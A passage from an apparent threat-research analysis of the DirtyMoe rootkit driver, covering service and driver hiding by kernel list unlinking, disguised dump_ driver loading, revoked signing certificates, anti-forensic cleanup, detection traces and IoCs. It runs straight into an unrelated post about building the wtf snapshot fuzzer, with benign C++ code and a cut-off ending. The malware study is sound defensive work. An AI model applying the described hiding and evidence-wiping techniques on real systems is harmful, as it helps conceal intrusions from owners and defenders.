Windows uses the Services Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at the system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all run services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the process services.exe and attach it to this one via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. The services.exe keeps all run services as a linked list of SERVICE_RECORD [5]. The malware driver iterates this list and unlinks required services defined by listServices whitelist; see Table 4.

The used byte sequence for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to the Windows version that the malware driver has never identified; maybe in development.

The hidden services cannot be detected using PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via Windows Event Log. Therefore, we can enumerate all regular services and all logged services. Then, we can create differences to find hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on the IOCTL from the user-mode. The Driver Entry is initiated by a parameter representing a driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called a driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to LDR_DATA_TABLE_ENTRY as a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. A driver image is not permanently stored on a disk since the service always extracts, loads, and deletes the driver images on the service startup. The secondary service aim is to eliminate evidence about driver loading and eventually complicate a forensic analysis. The service aspires to camouflage registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, which is the Windows common naming convention. Moreover, ImagePath prefixed with dump_ string is used for virtual drivers (loaded only in memory) managing the memory dump during the Windows crash. The malware tries to use the virtual driver name convention not to be so conspicuous. The principle of the Dump Memory using the virtual drivers is described in [7, 8].

ImagePath values are different from each windows reboot, but it always abuses the name of the system native driver; see a few instances collected during windows boot: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via the API call. Therefore, a forensics track can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes a relevant HIVE pointer, but unreferenced data is still present in the HIVE stored on the disk. Hence, we can read removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing driver image and register keys

The malware service is responsible for the driver loading and cleans up of loading evidence. We put a breakpoint into the nt!IopLoadDriver() kernel method, which is reached if a process wants to load a driver into the system. We waited for the wanted driver, and then we listed all the system processes. The corresponding service (svchost.exe) has a call stack that contains the kernel call for driver loading, but the corresponding service has been killed by EIP registry modifying. The process (service) was killed, and the whole Windows ended in BSoD. Windows made a crash dump, so the file system caches have been flushed, and the malicious service did not finish the cleanup in time. Therefore, we were able to mount a volume and read all wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers must be code-signed. The digital code-signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates since this topic is really wide. The backward compatibility but also a potential impact on the kernel implementation play a role.

DirtyMoe drivers are signed with three certificates as follow:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities, and they are registered as stolen, leaked, misuse, etc. [10]. Although all certificates have been revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in the user-mode. However, the driver implements the authorization instrument, which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine who should gain access and what should not get to the filesystem.

Thread Monitoring and Code injection

The DirtyMoe driver enrolls a malicious routine which is invoked if the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads arbitrary DLL into the new thread. 

Registry Hiding

This technique abuses the kernel hook method that indexes registry keys in HIVE. The code execution of the hook method is redirected to the malicious routine so that the driver can control the indexing of registry keys. Actually, the driver can select which keys will be indexed or not.

Service and Driver Hiding

Patching of specific kernel structures causes that certain API functions do not enumerate all system services or loaded drivers. Windows services and drivers are stored as a double-linked list in the kernel. The driver corrupts the kernel structures so that malicious services and drivers are unlinked from these structures. Consequently, if the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into the file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver deletes its own file from the file system through the kernel-mode. Therefore, the driver is loaded in the memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage since the API calls only remove the pointer from HIVE. The dumped driver file is never physically stored on the disk drive because its size is too small and is present only in cache memory. Accordingly, the file is removed from the cache before cache flushing to the disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super rootkit package. Any malware can register itself in the driver if knowing the authorization code. After successful registration, the malware can use a wide range of driver functionality. Hypothetically, the authorization code is hardcoded, and the driver’s name can be derived so we can communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never present in the file system physically, only in the cache. The driver is loaded via the API call, and the DirtyMoe service keeps a handler of the driver file, so the file manipulation with the driver file is limited. However, the driver removes its own file using kernel-call. Therefore, the driver file is removed from the file system cache, and the driver handler is still relevant, with the difference that the driver file does not exist, including its forensic traces.

The DirtyMoe malware is written using Delphi in most cases. Naturally, the driver is coded in native C. The code style of the driver and the rest of the malware is very different. We analyzed that most of the driver functionalities are downloaded from internet forums as public samples. Each implementation part of the driver is also written in a different style. The malware authors have merged individual rootkit functionality into one kit. They also merged known bugs, so the driver shows a few significant symptoms of driver presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signature certificates that are used have been revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates have been signed by the certification authority which Microsoft trusts, so the certificates signed in this way can be successfully loaded into the system despite their revocation. Moreover, the trend in the use of certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of the code-signature certificates in the future post.

6. Conclusion

DirtyMoe driver is an advanced piece of rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionally of the DirtyMoe driver and evaluate the impact on infected systems. This study set out to investigate and present the analysis of the DirtyMoe driver, namely its functionality, the ability to conceal, deployment, and code-signature.

The research has shown that the driver provides key functionalities to hide malicious processes, services, and registry keys. Another dangerous action of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements the minifilter, which monitors and affects I/O operations on the file system. Therefore, the content of the file system is filtered, and appropriate files/directories can be hidden for users. An implication of this finding is that malware itself and its artifacts are hidden even for AVs. More importantly, the driver implements another anti-forensic technique which removes the driver’s evidence from disk and registry immediately after driver loading. However, a few traces can be found on the victim’s machines.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. However, further experimental investigations are needed to hunt out and investigate other samples that have been signed by the revoked certificates. Because of this, the malware author can be traced and identified using thus abused certificates.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1

References

[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than traditionally,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel-crash dump which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work and so I reused it bdump.js.

Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump.
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

